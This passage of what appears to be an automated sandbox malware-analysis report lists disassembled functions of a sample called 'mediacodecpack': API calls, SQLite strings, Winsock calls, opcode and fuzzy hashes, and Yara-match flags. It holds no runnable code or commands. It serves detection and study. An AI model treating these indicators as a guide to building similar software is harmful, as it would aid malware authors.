                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$INTEGER
                                                                                            • API String ID: 317512412-1676293250
                                                                                            • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                            • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                            • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                              • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 4038589952-0
                                                                                            • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                            • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                            • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 247099642-0
                                                                                            • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                            • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                            • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                            APIs
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                            • String ID:
                                                                                            • API String ID: 326482775-0
                                                                                            • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                            • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                            • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D53B06,?,?,?,00000001), ref: 02D580ED
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D580F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: cda164a2ca07a8c7cb023f670cd13f171cbbfa026a1b4e8f4c1c867c4135caf8
                                                                                            • Instruction ID: c4c3efe48cfa38b15c45aa5e2ed204a2501d1a4b7b4bcc97484b7408dffab1fa
                                                                                            • Opcode Fuzzy Hash: cda164a2ca07a8c7cb023f670cd13f171cbbfa026a1b4e8f4c1c867c4135caf8
                                                                                            • Instruction Fuzzy Hash: 32B09231488208ABCB102BD1F81DB583F28FB04692FE44810F60E44250CB6299B09AE2
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                            • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 02D4E873
                                                                                              • Part of subcall function 02D4E6FA: _memmove.LIBCMT ref: 02D4E7B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memmove_memset
                                                                                            • String ID:
                                                                                            • API String ID: 3555123492-0
                                                                                            • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                            • Instruction ID: 4bbc2a0f8b02c269f949546708bc756e021f606ac1f409056787331bb881b388
                                                                                            • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                            • Instruction Fuzzy Hash: 9CF082B190430DBBD700DF99D942B8DFBB8FB44310F208169D50CA7341E6B07A118B90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                            • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                            • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                            • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                            • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                            • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                            • API String ID: 1320758876-2501389569
                                                                                            • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                            • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                            APIs
                                                                                            • sqlite3_free.SQLITE3 ref: 609264C9
                                                                                            • sqlite3_free.SQLITE3 ref: 60926526
                                                                                            • sqlite3_free.SQLITE3 ref: 6092652E
                                                                                            • sqlite3_free.SQLITE3 ref: 60926550
                                                                                              • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                              • Part of subcall function 6090AFF5: sqlite3_free.SQLITE3 ref: 6090B09A
                                                                                            • sqlite3_free.SQLITE3 ref: 60926626
                                                                                            • sqlite3_win32_mbcs_to_utf8.SQLITE3 ref: 6092662E
                                                                                            • sqlite3_free.SQLITE3 ref: 60926638
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 6092666B
                                                                                            • sqlite3_free.SQLITE3 ref: 60926673
                                                                                            • sqlite3_snprintf.SQLITE3 ref: 609266B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                            • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                            • API String ID: 937752868-2111127023
                                                                                            • Opcode ID: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                            • Instruction ID: 28f04709130b2e8b140c84fcd32bad5e17fba194e1ccee1aab8ced89c5ccf9cf
                                                                                            • Opcode Fuzzy Hash: 76700054f020c8d7fe753577c30eef17e659d67ca67044e42639e839992701d7
                                                                                            • Instruction Fuzzy Hash: EA712E706183058FE700AF69D88465DBFF6AFA5748F00C82DE8999B314E778C845DF92
                                                                                            APIs
                                                                                            Strings
                                                                                            • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                            • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                            • BEGIN;, xrefs: 609485DB
                                                                                            • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                            • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                            • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                            • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                            • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                            • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                            • API String ID: 632333372-52344843
                                                                                            • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                            • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D424E6
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D424FC
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D4250E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D4256D
                                                                                            • SetLastError.KERNEL32(00000000,?,7556DFB0), ref: 02D4257F
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7556DFB0), ref: 02D42599
                                                                                            • GetLastError.KERNEL32(?,7556DFB0), ref: 02D425A2
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D425F0
                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02D4262F
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D4268E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D42699
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D426AD
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7556DFB0), ref: 02D426BD
                                                                                            • GetLastError.KERNEL32(?,7556DFB0), ref: 02D426C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                            • String ID:
                                                                                            • API String ID: 1213838671-0
                                                                                            • Opcode ID: c1cde1fe82bfb6f26fb21f102e5c12ab51149d5624c7ac4bcbaf6912102b84c6
                                                                                            • Instruction ID: 27487fa09d6a9b0cc81f3527d7fbd878eb3a0227d3676029141eb04bb8808e7b
                                                                                            • Opcode Fuzzy Hash: c1cde1fe82bfb6f26fb21f102e5c12ab51149d5624c7ac4bcbaf6912102b84c6
                                                                                            • Instruction Fuzzy Hash: FE610971900209AFCB10DFA4D998AAEBBB9FF08314F50496AE956E7740DB34DD54CFA0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44608
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                            • htons.WS2_32(?), ref: 02D44669
                                                                                            • htonl.WS2_32(?), ref: 02D4468C
                                                                                            • htonl.WS2_32(00000000), ref: 02D44693
                                                                                            • htons.WS2_32(00000000), ref: 02D44747
                                                                                            • _sprintf.LIBCMT ref: 02D4475D
                                                                                              • Part of subcall function 02D47990: _memmove.LIBCMT ref: 02D479B0
                                                                                            • htons.WS2_32(?), ref: 02D446B0
                                                                                              • Part of subcall function 02D4873B: __EH_prolog.LIBCMT ref: 02D48740
                                                                                              • Part of subcall function 02D4873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487BB
                                                                                              • Part of subcall function 02D4873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487D9
                                                                                              • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                              • Part of subcall function 02D4CEF7: __EH_prolog.LIBCMT ref: 02D4CEFC
                                                                                            • htonl.WS2_32(?), ref: 02D4497C
                                                                                            • htonl.WS2_32(00000000), ref: 02D44983
                                                                                            • htonl.WS2_32(00000000), ref: 02D449C8
                                                                                            • htonl.WS2_32(00000000), ref: 02D449CF
                                                                                            • htons.WS2_32(?), ref: 02D449EF
                                                                                            • htons.WS2_32(?), ref: 02D449F9
                                                                                            Memory Dump Source
